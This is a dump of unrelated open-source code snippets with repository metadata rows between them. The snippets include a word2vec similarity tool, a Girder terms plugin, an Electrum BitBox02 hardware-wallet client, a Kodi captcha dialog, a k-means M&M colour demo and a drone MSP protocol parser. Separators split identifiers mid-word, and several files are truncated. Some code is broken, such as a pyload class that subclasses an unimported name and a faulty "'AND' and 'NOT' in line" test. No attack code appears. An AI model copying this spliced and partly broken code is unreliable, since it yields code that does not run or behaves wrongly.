except KeyError as e:
self.output_file.write(str(e))
self.output_file.write('\n')
def get_pos_negs_similar(self,input):
self.output_file.write('--- Similar words to: ' + input + '---\n')
pos_negs = input.split('NOT')
pos = pos_negs[0]
neg = pos_negs[1]
poss = pos.split('AND')
negs = neg.split(',')
positives = []
for p in poss:
positives.append(p.strip())
negatives = []
for n in negs:
negatives.append(n.strip())
try:
self.output_file.write(str(self.m.most_similar(positive=positives, negative=negatives, topn=self.n)))
except KeyError as e:
self.outpu
|
t_file.write(str(e))
self.output_file.write('\n')
def get_pos_similar(self,input):
self.output_file.write('--- Similar words to: ' + input + '---\n')
poss = input.split('AND')
positives = []
for p in poss:
positives.append(p.strip())
try:
self.output_file.write(str(self.m.most_similar(positive=positives, topn=self.n)))
except KeyError as e:
self.output_file.write(str(e))
s
|
elf.output_file.write('\n')
def get_similarity(self,input):
self.output_file.write('--- Similarity between: ' + input + '---\n')
parts = input.split('-')
try:
self.output_file.write(str(self.m.similarity(parts[0], parts[1])))
except KeyError as e:
self.output_file.write(str(e))
self.output_file.write('\n')
def process_input(self,input):
f = open(input, 'r+')
for line in f:
word = line.replace("\n", "")
if 'AND' and 'NOT' in line:
self.get_pos_negs_similar(word)
elif 'AND' in line:
self.get_pos_similar(word)
elif '-' in line:
self.get_similarity(word)
else:
self.get_most_similar(word)
if __name__ == "__main__":
if len(sys.argv) < 5:
sys.exit('Please provide [word2vec model] [input directory], [output directory] [similar word count]: [--s --s --s --int]')
Finder(sys.argv[1],sys.argv[3],int(sys.argv[4])).process_input(sys.argv[2])
|
adsorensen/girder
|
plugins/terms/server/__init__.py
|
Python
|
apache-2.0
| 3,937
| 0.003048
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
###############################################################################
# Copyright Kitware Inc.
#
# Licensed under the Apache License, Version 2.0 ( the "License" );
# you may not use this file ex
|
cept in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific lan
|
guage governing permissions and
# limitations under the License.
###############################################################################
import datetime
import hashlib
from girder import events
from girder.api import access
from girder.api.describe import Description, autoDescribeRoute
from girder.api.rest import boundHandler, RestException
from girder.api.v1.collection import Collection
from girder.constants import AccessType, TokenScope
from girder.models.model_base import ModelImporter
@access.user(scope=TokenScope.DATA_READ)
@boundHandler
@autoDescribeRoute(
Description('Accept a collection\'s Terms of Use for the current user.')
.modelParam('id', model='collection', level=AccessType.READ)
.param('termsHash', 'The SHA-256 hash of this collection\'s terms, encoded in hexadecimal.')
)
def acceptCollectionTerms(self, collection, termsHash):
if not collection.get('terms'):
raise RestException('This collection currently has no terms.')
# termsHash should be encoded to a bytes object, but storing bytes into MongoDB behaves
# differently in Python 2 vs 3. Additionally, serializing a bytes to JSON behaves differently
# in Python 2 vs 3. So, just keep it as a unicode (or ordinary Python 2 str).
realTermsHash = hashlib.sha256(collection['terms'].encode('utf-8')).hexdigest()
if termsHash != realTermsHash:
# This "proves" that the client has at least accessed the terms
raise RestException(
'The submitted "termsHash" does not correspond to the collection\'s current terms.')
ModelImporter.model('user').update(
{'_id': self.getCurrentUser()['_id']},
{'$set': {
'terms.collection.%s' % collection['_id']: {
'hash': termsHash,
'accepted': datetime.datetime.now()
}
}}
)
def afterPostPutCollection(event):
# This will only trigger if no exceptions (for access, invalid id, etc.) are thrown
extraParams = event.info['params']
if 'terms' in extraParams:
collectionResponse = event.info['returnVal']
collectionId = collectionResponse['_id']
terms = extraParams['terms']
ModelImporter.model('collection').update(
{'_id': collectionId},
{'$set': {'terms': terms}}
)
collectionResponse['terms'] = terms
event.addResponse(collectionResponse)
def load(info):
# Augment the collection creation and edit routes to accept a terms field
events.bind('rest.post.collection.after', 'terms', afterPostPutCollection)
events.bind('rest.put.collection/:id.after', 'terms', afterPostPutCollection)
for handler in [
Collection.createCollection,
Collection.updateCollection
]:
handler.description.param('terms', 'The Terms of Use for the collection.', required=False)
# Expose the terms field on all collections
ModelImporter.model('collection').exposeFields(level=AccessType.READ, fields={'terms'})
# Add endpoint for registered users to accept terms
info['apiRoot'].collection.route('POST', (':id', 'acceptTerms'), acceptCollectionTerms)
# Expose the terms field on all users
ModelImporter.model('user').exposeFields(level=AccessType.ADMIN, fields={'terms'})
|
ardi69/pyload-0.4.10
|
pyload/plugin/crypter/Dereferer.py
|
Python
|
gpl-3.0
| 584
| 0.017123
|
# -*- coding: utf-8 -*-
from pyload.plugin.Crypter import Crypter
class Dereferer(SimpleDereferer):
__name = "Dereferer"
|
__type = "crypter"
__version = "0.11"
__pattern = r'https?://([^/]+)/.*?(?P<LINK>(ht|f)tps?(://|%3A%2F%2F).+)'
__config = [("use_subfolder" , "bool", "Save package to subfolder" , True),
("subfolder_per_pack", "bool", "Create a subfolder for each package", True)]
__description = """Crypter for de
|
referers"""
__license = "GPLv3"
__authors = [("zoidberg", "[email protected]")]
|
chromium/chromium
|
testing/merge_scripts/code_coverage/merge_lib_test.py
|
Python
|
bsd-3-clause
| 1,506
| 0.007968
|
#!/usr/bin/env vpython
# Copyright 2019 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-s
|
tyle license that can be
# found in the LICENSE file.
import os
import subprocess
import sys
import unittest
import mock
import merge
|
_lib as merger
class MergeLibTest(unittest.TestCase):
# pylint: disable=super-with-arguments
def __init__(self, *args, **kwargs):
super(MergeLibTest, self).__init__(*args, **kwargs)
self.maxDiff = None
# pylint: enable=super-with-arguments
@mock.patch.object(subprocess, 'check_output')
def test_validate_and_convert_profraw(self, mock_cmd):
test_cases = [
([''], [['mock.profdata'], [], []]),
(['Counter overflow'], [[], ['mock.profraw'], ['mock.profraw']]),
(subprocess.CalledProcessError(
255,
'llvm-cov merge -o mock.profdata -sparse=true mock.profraw',
output='Malformed profile'), [[], ['mock.profraw'], []]),
]
for side_effect, expected_results in test_cases:
mock_cmd.side_effect = side_effect
output_profdata_files = []
invalid_profraw_files = []
counter_overflows = []
merger._validate_and_convert_profraw(
'mock.profraw', output_profdata_files, invalid_profraw_files,
counter_overflows, '/usr/bin/llvm-cov')
self.assertEqual(
expected_results,
[output_profdata_files, invalid_profraw_files, counter_overflows])
if __name__ == '__main__':
unittest.main()
|
GroestlCoin/electrum-grs
|
electrum_grs/plugins/bitbox02/bitbox02.py
|
Python
|
gpl-3.0
| 27,314
| 0.002123
|
#
# BitBox02 Electrum plugin code.
#
import hid
from typing import TYPE_CHECKING, Dict, Tuple, Optional, List, Any, Callable
from electrum_grs import bip32, constants
from electrum_grs.i18n import _
from electrum_grs.keystore import Hardware_KeyStore
from electrum_grs.transaction import PartialTransaction
from electrum_grs.wallet import Standard_Wallet, Multisig_Wallet, Deterministic_Wallet
from electrum_grs.util import bh2u, UserFacingException
from electrum_grs.base_wizard import ScriptTypeNotSupported, BaseWizard
from electrum_grs.logging import get_logger
from electrum_grs.plugin import Device, DeviceInfo, runs_in_hwd_thread
from electrum_grs.simple_config import SimpleConfig
from electrum_grs.json_db import StoredDict
from electrum_grs.storage import get_derivation_used_for_hw_device_encryption
from electrum_grs.bitcoin import OnchainOutputType
import electrum_grs.bitcoin as bitcoin
import electrum_grs.ecc as ecc
from ..hw_wallet import HW_PluginBase, HardwareClientBase
_logger = get_logger(__name__)
try:
from bitbox02 import bitbox02
from bitbox02 import util
from bitbox02.communication import (
devices,
HARDENED,
u2fhid,
bitbox_api_protocol,
FirmwareVersionOutdatedException,
)
requirements_ok = True
except ImportError as e:
if not (isinstance(e, ModuleNotFoundError) and e.name == 'bitbox02'):
_logger.exception('error importing bitbox02 plugin deps')
requirements_ok = False
class BitBox02Client(HardwareClientBase):
# handler is a BitBox02_Handler, importing it would lead to a circular dependency
def __init__(self, handler: Any, device: Device, config: SimpleConfig, *, plugin: HW_PluginBase):
HardwareClientBase.__init__(self, plugin=plugin)
self.bitbox02_device = None # type: Optional[bitbox02.BitBox02]
self.handler = handler
self.device_descriptor = device
self.config = config
self.bitbox_hid_info = None
if self.config.get("bitbox02") is None:
bitbox02_config: dict = {
"remote_static_noise_keys": [],
"noise_privkey": None,
}
self.config.set_key("bitbox02", bitbox02_config)
bitboxes = devices.get_any_bitbox02s()
for bitbox in bitboxes:
if (
bitbox["path"] == self.device_descriptor.path
and bitbox["interface_number"]
== self.device_descriptor.interface_number
):
self.bitbox_hid_info = bitbox
if self.bitbox_hid_info is None:
raise Exception("No BitBox02 detected")
def is_initialized(self) -> bool:
return True
@runs_in_hwd_thread
def close(self):
try:
self.bitbox02_device.close()
except:
pass
def has_usable_connection_with_device(self) -> bool:
if self.bitbox_hid_info is None:
return False
return True
@runs_in_hwd_thread
def get_soft_device_id(self) -> Optional[str]:
if self.handler is None:
# Can't do the pairing without the handler. This happens at wallet creation time, when
# listing the devices.
return None
if self.bitbox02_device is None:
self.pairing_dialog()
return self.bitbox02_device.root_fingerprint().hex()
@runs_in_hwd_thread
def pairing_dialog(self):
def pairing_step(code: str, device_response: Callable[[], bool]) -> bool:
msg = "Please compare and confirm the pairing code on your BitBox02:\n" + code
self.handler.show_message(msg)
try:
res = device_response()
except:
# Close the hid device on exception
hid_device.close()
raise
finally:
self.handler.finished()
return res
def exists_remote_static_pubkey(pubkey: bytes) -> bool:
bitbox02_config = self.config.get("bitbox02")
noise_keys = bitbox02_config.get("remote_static_noise_keys")
if noise_keys is not None:
if pubkey.hex() in [noise_key for noise_key in noise_keys]:
return True
return False
def set_remote_static_pubkey(pubkey: bytes) -> None:
if not exists_remote_static_pubkey(pubkey):
bitbox02_config = self.config.get("bitbox02")
if bitbox02_config.get("remote_static_noise_keys") is not None:
bitbox02_config["remote_static_noise_keys"].append(pubkey.hex())
else:
bitbox02_config["remote_static_noise_keys"] = [pubkey.hex()]
self.config.set_key("bitbox02", bitbox02_config)
def get_noise_privkey() -> Optional[bytes]:
bitbox02_config = self.config.get("bitbox02")
privkey = bitbox02_config.get("noise_privkey")
if privkey is not None:
return bytes.fromhex(privkey)
return None
def set_noise_privkey(privkey: bytes) -> None:
bitbox02_config = self.config.get("bitbox02")
bitbox02_config["noise_privkey"] = privkey.hex()
self.config.set_key("bitbox02", bitbox02_config)
def attestation_warning() -> None:
self.handler.show_error(
"The BitBox02 attestation failed.\nTry reconnecting the BitBox02.\nWarning: The device might not be genuine, if the\n problem persists please contact Shift support.",
blocking=True
)
class NoiseConfig(bitbox_api_protocol.BitBoxNoiseConfig):
"""NoiseConfig extends BitBoxNoiseConfig"""
def show_pairing(self, code: str, device_response: Callable[[], bool]) -> bool:
return pairing_step(code, device_response)
def attestation_check(self, result: bool) -> None:
if not result:
attestation_warning()
def contains_device_static_pubkey(self, pubkey: bytes) -> bool:
return exists_remote_static_pubkey(pubkey)
def add_device_static_pubkey(self, pubkey: bytes) -> None:
return set_remote_static_pubkey(pubkey)
def get_app_static_privkey(self) -> Optional[bytes]:
return get_noise_privkey()
def set_app_static_privkey(self, privkey: bytes) -> None:
return set_noise_privkey(privkey)
if self.bitbox02_device is None:
hid_device = hid.device()
hid_device.open_path(self.bitbox_hid_info["path"])
bitbox02_device = bitbox02.BitBox02(
transport=u2fhid.U2FHid(hid_device),
device_info=self.bitbox_hid_info,
noise_config=NoiseConfig(),
)
try:
bitbox02_device.check_min_version()
except FirmwareVersionOutdatedException:
raise
self.bitbox02_device = bitbox02_device
self.fail_if_not_initialized()
def fail_if_not_initialized(self) -> None:
assert self.bitbox02_device
if not self.bitbox02_device.device_info()["initialized"]:
raise Exception(
"Please initialize the BitBox02 using the BitBox app first before using the BitBox02 in electrum"
)
def coin_network_from_electrum_network(self) -> int:
if constants.net.TESTNET:
return bitbox02.btc.TBTC
return bitbox02.btc.BTC
@runs_in_hwd_thread
def get_password_for_storage_encryption(self) -> str:
derivation = get_derivation_used_for_hw_device_encryption()
derivation_list = bi
|
p32.convert_bip32_path_to_list_of_uint32(derivation)
xpub = self.bitbox02_device.electrum_encryption_key(derivation_list)
node = bip32.BIP32No
|
de.from_xkey(xpub, net = constants.BitcoinMainnet()).subkey_at_public_derivation(())
return node.eckey.get_public_key_bytes(compressed=True).hex()
@runs_in_hwd_thread
def get_xpub(self, bip32_path: str, xtype: str, *, display: boo
|
etherkit/OpenBeacon2
|
macos/venv/lib/python3.8/site-packages/PyInstaller/hooks/hook-gi.repository.Champlain.py
|
Python
|
gpl-3.0
| 702
| 0.002849
|
#-----------------------------------------------------------------------------
# Copyright (c) 2005-2020, PyInstaller Development Team.
#
# Dis
|
tributed under the terms of the GNU General Public License (version 2
# or later) with exception for distributing the bootloader.
#
# The full license is in the file COPYING.txt, distributed with this software.
#
# SPDX-License-Identifier: (GPL-2.0-or-later WITH Bootloader-exception)
#-----------------------------------------------------------------------------
"""
Import hook for PyGObject's "gi.repository.Champlain" package.
"""
from PyInstaller.utils.h
|
ooks import get_gi_typelibs
binaries, datas, hiddenimports = get_gi_typelibs('Champlain', '0.12')
|
kevinhikali/ml_kevin
|
tf/tf_cast.py
|
Python
|
gpl-3.0
| 250
| 0
|
# -*- coding: utf-8 -*-
"""
@autho
|
r: kevinhikali
@email: [email protected]
"""
import tensorflow as tf
A = [[1, 2, 3, 4]]
B = [[2, 2, 3, 4]]
casted = tf.cast(tf.equal(A, B), dtype='float32')
|
with tf.Session() as sess:
print(sess.run(casted))
|
bbcf/bsPlugins
|
tests/test_Annotate.py
|
Python
|
gpl-3.0
| 717
| 0.011158
|
from unittest2 import TestCase, skip
from bsPlugins.Annotate import AnnotatePlugin
import os
path = 'testing_files/'
class Test_AnnotatePlugin(TestCase):
def setUp(self):
self.plugin = AnnotatePlugin()
def test_with_signals(self):
s
|
elf.plugin(**{'track':path+'KO50.bedGraph', 'assembly':'mm9',
'promoter':0, 'intergenic':0, 'UTR':0})
with open(self.plugin.output_files[0][0],'rb') as f:
content = f.readlines()
self.assertEqual(len(content),50)
def tearDown(self):
for f in os.listdir('.'):
if f.startswith('tmp'):
os.system("rm -rf %s" % f)
# nosetest
|
s --logging-filter=-tw2 test_Annotate.py
|
mrquim/mrquimrepo
|
repo/plugin.video.live.magellan/unCaptcha.py
|
Python
|
gpl-2.0
| 14,966
| 0.029467
|
# -*- coding: utf-8 -*-
import random
import re
import time
import urlparse, urllib,urllib2,cookielib
from base64 import b64encode
import xbmc
import xbmcgui,xbmcaddon,os
__scriptID__ = 'plugin.video.live.magellan'
__addon__ = xbmcaddon.Addon(__scriptID__)
class cInputWindow(xbmcgui.WindowDialog):
def __init__(self, *args, **kwargs):
bg_image = os.path.join( __addon__.getAddonInfo('path'), 'Images/' ) + "background.png"
check_image = os.path.join( __addon__.getAddonInfo('path'), 'Images/' ) + "trans_checked.png"
uncheck_image = os.path.join( __addon__.getAddonInfo('path'), 'Images/' ) + "trans_unchecked1.png"
self.ctrlBackgound = xbmcgui.ControlImage(
0,0,
1280, 720,
bg_image
)
self.cancelled=False
self.addControl (self.ctrlBackgound)
self.msg = kwargs.get('msg')+'\nNormally there are 3-4 selections and 2 rounds of pictures'
self.round=kwargs.get('round')
self.strActionInfo = xbmcgui.ControlLabel(335, 120, 700, 300, self.msg, 'font13', '0xFFFF00FF')
self.addControl(self.strActionInfo)
self.strActionInfo = xbmcgui.ControlLabel(335, 20, 724, 400, 'Captcha round %s'%(str(self.round)), 'font40', '0xFFFF00FF')
self.addControl(self.strActionInfo)
self.cptloc = kwargs.get('captcha')
#self.img = xbmcgui.ControlImage(335,200,624,400,self.cptloc)
imgw=400
imgh=300
imgX=335
imgY=200
pw=imgw/3
ph=imgh/3
self.img = xbmcgui.ControlImage(imgX,imgY,imgw,imgh,self.cptloc)
self.addControl(self.img)
self.chk=[0]*9
self.chkbutton=[0]*9
self.chkstate=[False]*9
#self.chk[0] = xbmcgui.ControlCheckMark(335,200,200,200,'select',checkWidth=30, checkHeight=30)
self.chk[0]= xbmcgui.ControlImage(imgX,imgY, pw, ph,check_image)# '', font='font1',focusTexture=check_image ,noFocusTexture=uncheck_image,checkWidth=220,checkHeight=150)
self.chk[1]= xbmcgui.ControlImage(imgX+pw,imgY, pw, ph,check_image)# '', font='font14',focusTexture=check_image ,noFocusTexture=uncheck_image,checkWidth=220,checkHeight=150)
self.chk[2]= xbmcgui.ControlImage(imgX+pw+pw,imgY, pw, ph,check_image)# '', font='font14',focusTexture=check_image ,noFocusTexture=uncheck_image,checkWidth=220,checkHeight=150)
self.chk[3]= xbmcgui.ControlImage(imgX,imgY+ph, pw, ph,check_image)# '', font='font14',focusTexture=check_image ,noFocusTexture=uncheck_image,checkWidth=220,checkHeight=150)
self.chk[4]= xbmcgui.ControlImage(imgX+pw,imgY+ph, pw, ph,check_image)# '', font='font14',focusTexture=check_image ,noFocusTexture=uncheck_image,checkWidth=220,checkHeight=150)
self.chk[5]= xbmcgui.ControlImage(imgX+pw+pw,imgY+ph, pw, ph,check_image)# '', font='font14',focusTexture=check_image ,noFocusTexture=uncheck_image,checkWidth=220,checkHeight=150)
self.chk[6]= xbmcgui.ControlImage(imgX,imgY+ph+ph, pw, ph,check_image)#, '', font='font14',focusTexture=check_image ,noFocusTexture=uncheck_image,checkWidth=220,checkHeight=150)
self.chk[7]= xbmcgui.ControlImage(imgX+pw,imgY+ph+ph, pw, ph,check_image)# '', font='font14',focusTexture=check_image ,noFocusTexture=uncheck_image,checkWidth=220,checkHeight=150)
self.chk[8]= xbmcgui.ControlImage(imgX+pw+pw,imgY+ph+ph, pw, ph,check_image)# '', font='font14',focusTexture=check_image ,noFocusTexture=uncheck_image,checkWidth=220,checkHeight=150)
self.chkbutton[0]= xbmcgui.ControlButton(imgX,imgY, pw, ph, '1', font='font1');#,focusTexture=check_image ,noFocusTexture=uncheck_image);#,checkWidth=220,checkHeight=150)
self.chkbutton[1]= xbmcgui.ControlButton(imgX+pw,imgY, pw, ph, '2', font='font1');#,focusTexture=check_image ,noFocusTexture=uncheck_image);#,checkWidth=220,checkHeight=150)
self.chkbutton[2]= xbm
|
cgui.ControlButton(imgX+pw+pw,imgY, pw, ph, '3', font='font1');#,focusTexture=check_image ,noFocusTexture=uncheck_image);#,checkWidth=220,checkHeight=150)
self.chkbutton[3]= xbmcgui.ControlButton(imgX,imgY+
|
ph, pw, ph, '4', font='font1');#,focusTexture=check_image ,noFocusTexture=uncheck_image);#,checkWidth=220,checkHeight=150)
self.chkbutton[4]= xbmcgui.ControlButton(imgX+pw,imgY+ph, pw, ph, '5', font='font1');#,focusTexture=check_image ,noFocusTexture=uncheck_image);#,checkWidth=220,checkHeight=150)
self.chkbutton[5]= xbmcgui.ControlButton(imgX+pw+pw,imgY+ph, pw, ph, '6', font='font1');#,focusTexture=check_image ,noFocusTexture=uncheck_image);#,checkWidth=220,checkHeight=150)
self.chkbutton[6]= xbmcgui.ControlButton(imgX,imgY+ph+ph, pw, ph, '7', font='font1');#,focusTexture=check_image ,noFocusTexture=uncheck_image);#,checkWidth=220,checkHeight=150)
self.chkbutton[7]= xbmcgui.ControlButton(imgX+pw,imgY+ph+ph, pw, ph, '8', font='font1');#,focusTexture=check_image ,noFocusTexture=uncheck_image);#,checkWidth=220,checkHeight=150)
self.chkbutton[8]= xbmcgui.ControlButton(imgX+pw+pw,imgY+ph+ph, pw, ph, '9', font='font1');#,focusTexture=check_image ,noFocusTexture=uncheck_image);#,checkWidth=220,checkHeight=150)
for obj in self.chk:
self.addControl(obj )
obj.setVisible(False)
for obj in self.chkbutton:
self.addControl(obj )
#self.chk[0].setSelected(False)
self.cancelbutton = xbmcgui.ControlButton(imgX+(imgw/2)-110,imgY+imgh+10,100,40,'Cancel',alignment=2)
self.okbutton = xbmcgui.ControlButton(imgX+(imgw/2)+10,imgY+imgh+10,100,40,'OK',alignment=2)
self.addControl(self.okbutton)
self.addControl(self.cancelbutton)
self.chkbutton[6].controlDown(self.cancelbutton); self.chkbutton[6].controlUp(self.chkbutton[3])
self.chkbutton[7].controlDown(self.cancelbutton); self.chkbutton[7].controlUp(self.chkbutton[4])
self.chkbutton[8].controlDown(self.okbutton); self.chkbutton[8].controlUp(self.chkbutton[5])
self.chkbutton[6].controlLeft(self.chkbutton[8]);self.chkbutton[6].controlRight(self.chkbutton[7]);
self.chkbutton[7].controlLeft(self.chkbutton[6]);self.chkbutton[7].controlRight(self.chkbutton[8]);
self.chkbutton[8].controlLeft(self.chkbutton[7]);self.chkbutton[8].controlRight(self.chkbutton[6]);
self.chkbutton[3].controlDown(self.chkbutton[6]); self.chkbutton[3].controlUp(self.chkbutton[0])
self.chkbutton[4].controlDown(self.chkbutton[7]); self.chkbutton[4].controlUp(self.chkbutton[1])
self.chkbutton[5].controlDown(self.chkbutton[8]); self.chkbutton[5].controlUp(self.chkbutton[2])
self.chkbutton[3].controlLeft(self.chkbutton[5]);self.chkbutton[3].controlRight(self.chkbutton[4]);
self.chkbutton[4].controlLeft(self.chkbutton[3]);self.chkbutton[4].controlRight(self.chkbutton[5]);
self.chkbutton[5].controlLeft(self.chkbutton[4]);self.chkbutton[5].controlRight(self.chkbutton[3]);
self.chkbutton[0].controlDown(self.chkbutton[3]); self.chkbutton[0].controlUp(self.cancelbutton)
self.chkbutton[1].controlDown(self.chkbutton[4]); self.chkbutton[1].controlUp(self.cancelbutton)
self.chkbutton[2].controlDown(self.chkbutton[5]); self.chkbutton[2].controlUp(self.okbutton)
self.chkbutton[0].controlLeft(self.chkbutton[2]);self.chkbutton[0].controlRight(self.chkbutton[1]);
self.chkbutton[1].controlLeft(self.chkbutton[0]);self.chkbutton[1].controlRight(self.chkbutton[2]);
self.chkbutton[2].controlLeft(self.chkbutton[1]);self.chkbutton[2].controlRight(self.chkbutton[0]);
self.cancelled=False
self.setFocus(self.okbutton)
self.okbutton.controlLeft(self.cancelbutton);self.okbutton.controlRight(self.cancelbutton);
self.cancelbutton.controlLeft(self.okbutton); self.cancelbutton.controlRight(self.okbutton);
self.okbutton.controlDown(self.chkbutton[2]);self.okbutton.controlUp(self.chkbutton[8]);
|
scikit-image/skimage-demos
|
mm_color_cluster.py
|
Python
|
bsd-3-clause
| 2,030
| 0.000985
|
# Auto-clustering, suggested by Matt Terry
from skimage import io, color, exposure
from sklearn import cluster, preprocessing
import numpy as np
import matplotlib.pyplot as plt
url = 'http://blogs.mathworks.com/images/steve/2010/mms.jpg'
import os
if not os.path.exists('mm.jpg'):
print("Downloading M&M's...")
from urllib.request import urlretrieve
urlretrieve(url, 'mm.jpg')
print("Image I/O...")
mm = io.imread('mm.jpg')
mm_lab = color.rgb2lab(mm)
ab = mm_lab[..., 1:]
print("Mini-batch K-means...")
X = ab.reshape(-1, 2)
kmeans = cluster.MiniBatchKMeans(n_clusters=6)
y = kmeans.fit(X).labels_
labels = y.reshape(mm.shape[:2])
N = labels.max()
def no_ticks(a
|
x):
ax.set_xticks([])
ax.set_yticks([])
# Display all clusters
for i
|
in range(N):
mask = (labels == i)
mm_cluster = mm_lab.copy()
mm_cluster[..., 1:][~mask] = 0
ax = plt.subplot2grid((2, N), (1, i))
ax.imshow(color.lab2rgb(mm_cluster))
no_ticks(ax)
ax = plt.subplot2grid((2, N), (0, 0), colspan=2)
ax.imshow(mm)
no_ticks(ax)
# Display histogram
L, a, b = mm_lab.T
left, right = -100, 100
bins = np.arange(left, right)
H, x_edges, y_edges = np.histogram2d(a.flatten(), b.flatten(), bins,
normed=True)
ax = plt.subplot2grid((2, N), (0, 2))
H_bright = exposure.rescale_intensity(H, in_range=(0, 5e-4))
ax.imshow(H_bright,
extent=[left, right, right, left], cmap=plt.cm.gray)
ax.set_title('Histogram')
ax.set_xlabel('b')
ax.set_ylabel('a')
# Voronoi diagram
mid_bins = bins[:-1] + 0.5
L = len(mid_bins)
yy, xx = np.meshgrid(mid_bins, mid_bins)
Z = kmeans.predict(np.column_stack([xx.ravel(), yy.ravel()]))
Z = Z.reshape((L, L))
ax = plt.subplot2grid((2, N), (0, 3))
ax.imshow(Z, interpolation='nearest',
extent=[left, right, right, left],
cmap=plt.cm.Spectral, alpha=0.8)
ax.imshow(H_bright, alpha=0.2,
extent=[left, right, right, left],
cmap=plt.cm.gray)
ax.set_title('Clustered histogram')
no_ticks(ax)
plt.show()
|
allenai/allennlp
|
allennlp/modules/seq2vec_encoders/seq2vec_encoder.py
|
Python
|
apache-2.0
| 1,215
| 0.005761
|
from allennlp.modules.encoder_base import _EncoderBase
from allennlp.common import Registrable
class Seq2VecEncoder(_EncoderBase, Registrable):
"""
A `Seq2VecEncoder` is a `Module` that takes as input a sequence of vectors and returns a
single vector. Input shape : `(batch_size, sequence_length, input_dim)`; output shape:
`(batch_size, output_dim)`.
We add two methods to the basic `Module` API: `get_input_dim()` and `get_output_dim()`.
You might need this if you want to construct a `Linear` layer using the output of this encoder,
or to raise sensible errors for mis-matching input dimensions.
"""
def get_input_dim(self) -> int:
"""
Returns the dimension of the vector input for each element in the sequence input
to a `Seq2VecEncoder`. This is `not` the shape of the input tensor, but the
last element of that shape.
"""
raise NotImplem
|
entedError
def get_output_dim(sel
|
f) -> int:
"""
Returns the dimension of the final vector output by this `Seq2VecEncoder`. This is `not`
the shape of the returned tensor, but the last element of that shape.
"""
raise NotImplementedError
|
william-fiset/Survival
|
__init__.py
|
Python
|
apache-2.0
| 79
| 0.012658
|
f
|
rom .main import main
# run the program
if __name__ == '__main__':
main(
|
)
|
SelvorWhim/competitive
|
Codewars/PrincipalDiagonalVsSecondaryDiagonal.py
|
Python
|
unlicense
| 396
| 0.007576
|
def sum_diagonal_principal(matrix):
return sum(matrix[i][i] for i in range(len(matrix)))
def sum_diagonal_secondary(matrix):
return sum(matrix[i][-i-1] for i in range(len(matrix)))
def diagonal(matrix):
s1 = sum_diagonal_principal(matrix)
s2 = sum_diagonal_secondary(matrix)
|
return "Principal Diagonal win!" if s1 > s2 else "Secondary Diagonal win!"
|
if s1 < s2 else "Draw!"
|
AlexWPerfComm/Python-JIRA
|
const/Constants.py
|
Python
|
mit
| 65
| 0
|
AUTH_URL = "https://quality.hubwoo.com/rest/auth/latest/s
|
essi
|
on"
|
squilter/ardupilot
|
libraries/AP_MSP/Tools/pymsp.py
|
Python
|
gpl-3.0
| 18,847
| 0.014114
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
author: Alex Apostoli
based on https://github.com/hkm95/python-multiwii
which is under GPLv3
"""
import struct
import time
import sys
import re
class MSPItem:
def __init__(self, name, fmt, fields):
self.name = name
self.format = fmt
self.fields = fields
if not isinstance(self.format, list):
self.format = [self.format]
self.fields = [self.fields]
self.values = {}
def parse(self, msp, dataSize):
'''parse data'''
ofs = msp.p
for i in range(len(self.format)):
fmt = self.format[i]
fields = self.fields[i].split(',')
if fmt[0] == '{':
# we have a repeat count from an earlier variable
right = fmt.find('}')
vname = fmt[1:right]
count = self.values[vname]
fmt = "%u%s" % (count, fmt[right+1:])
if fmt[0].isdigit():
repeat = int(re.search(r'\d+', fmt).group())
else:
repeat = None
fmt = "<" + fmt
fmt_size = struct.calcsize(fmt)
if dataSize < fmt_size:
raise Exception("Format %s needs %u bytes got %u for %s" % (self.name, fmt_size, dataSize, fmt))
values = list(struct.unpack(fmt, msp.inBuf[ofs:ofs+fmt_size]))
if
|
repeat is not None:
for i in range(len(fields)):
self.values[fields[i]] = []
for j in range(repeat):
self.values[fields[i]].append(values[j*len(fields)])
else:
for i in range(len(fields)):
|
self.values[fields[i]] = values[i]
dataSize -= fmt_size
ofs += fmt_size
msp.by_name[self.name] = self
#print("Got %s" % self.name)
class PyMSP:
""" Multiwii Serial Protocol """
OSD_RSSI_VALUE = 0
OSD_MAIN_BATT_VOLTAGE = 1
OSD_CROSSHAIRS = 2
OSD_ARTIFICIAL_HORIZON = 3
OSD_HORIZON_SIDEBARS = 4
OSD_ITEM_TIMER_1 = 5
OSD_ITEM_TIMER_2 = 6
OSD_FLYMODE = 7
OSD_CRAFT_NAME = 8
OSD_THROTTLE_POS = 9
OSD_VTX_CHANNEL = 10
OSD_CURRENT_DRAW = 11
OSD_MAH_DRAWN = 12
OSD_GPS_SPEED = 13
OSD_GPS_SATS = 14
OSD_ALTITUDE = 15
OSD_ROLL_PIDS = 16
OSD_PITCH_PIDS = 17
OSD_YAW_PIDS = 18
OSD_POWER = 19
OSD_PIDRATE_PROFILE = 20
OSD_WARNINGS = 21
OSD_AVG_CELL_VOLTAGE = 22
OSD_GPS_LON = 23
OSD_GPS_LAT = 24
OSD_DEBUG = 25
OSD_PITCH_ANGLE = 26
OSD_ROLL_ANGLE = 27
OSD_MAIN_BATT_USAGE = 28
OSD_DISARMED = 29
OSD_HOME_DIR = 30
OSD_HOME_DIST = 31
OSD_NUMERICAL_HEADING = 32
OSD_NUMERICAL_VARIO = 33
OSD_COMPASS_BAR = 34
OSD_ESC_TMP = 35
OSD_ESC_RPM = 36
OSD_REMAINING_TIME_ESTIMATE = 37
OSD_RTC_DATETIME = 38
OSD_ADJUSTMENT_RANGE = 39
OSD_CORE_TEMPERATURE = 40
OSD_ANTI_GRAVITY = 41
OSD_G_FORCE = 42
OSD_MOTOR_DIAG = 43
OSD_LOG_STATUS = 44
OSD_FLIP_ARROW = 45
OSD_LINK_QUALITY = 46
OSD_FLIGHT_DIST = 47
OSD_STICK_OVERLAY_LEFT = 48
OSD_STICK_OVERLAY_RIGHT = 49
OSD_DISPLAY_NAME = 50
OSD_ESC_RPM_FREQ = 51
OSD_RATE_PROFILE_NAME = 52
OSD_PID_PROFILE_NAME = 53
OSD_PROFILE_NAME = 54
OSD_RSSI_DBM_VALUE = 55
OSD_RC_CHANNELS = 56
OSD_CAMERA_FRAME = 57
MSP_NAME =10
MSP_OSD_CONFIG =84
MSP_IDENT =100
MSP_STATUS =101
